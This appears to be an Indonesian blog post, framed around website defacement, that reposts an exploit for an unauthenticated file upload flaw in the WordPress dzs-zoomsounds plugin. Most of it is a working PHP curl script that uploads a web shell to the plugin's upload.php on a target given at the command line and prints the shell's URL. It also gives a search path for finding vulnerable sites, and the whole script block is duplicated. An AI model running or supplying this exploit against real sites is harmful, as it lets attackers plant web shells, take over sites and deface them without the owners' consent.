Wordpress zoom sounds plugin file Upload
Deface dengan Wordpress zoom sounds plugin file Upload
# Exploit Title: Wordpress zoom sounds plugin file Upload
# Date: 30/05/2015
# Exploit Author: Moroccanwolf
# website Author : http://moroccanwolf.com
# Tested on: Linux
# Drok : /plugins/dzs-zoomsounds/
php code :
$site = $argv[1];
$name = "your shell.phtml";
$lol = curl_init("$site/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($lol, CURLOPT_POST, true);
curl_setopt($lol, CURLOPT_POSTFIELDS, array( 'file_field'=>"@$name"));
curl_setopt($lol, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($lol, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($lol, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
$exec = curl_exec($lol);
curl_close($lol);
if (preg_match('/success/i',$exec)){
echo "Success => http://$site/wp-content/plugins/dzs-zoomsounds/admin/upload/$name \n";
}else{
echo "Exploit Failed => $site\n";
}
usage : php script.php site
# Date: 30/05/2015
# Exploit Author: Moroccanwolf
# website Author : http://moroccanwolf.com
# Tested on: Linux
# Drok : /plugins/dzs-zoomsounds/
php code :
$site = $argv[1];
$name = "your shell.phtml";
$lol = curl_init("$site/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($lol, CURLOPT_POST, true);
curl_setopt($lol, CURLOPT_POSTFIELDS, array( 'file_field'=>"@$name"));
curl_setopt($lol, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($lol, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($lol, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
$exec = curl_exec($lol);
curl_close($lol);
if (preg_match('/success/i',$exec)){
echo "Success => http://$site/wp-content/plugins/dzs-zoomsounds/admin/upload/$name \n";
}else{
echo "Exploit Failed => $site\n";
}
usage : php script.php site
Belum ada Komentar untuk "Wordpress zoom sounds plugin file Upload "
Posting Komentar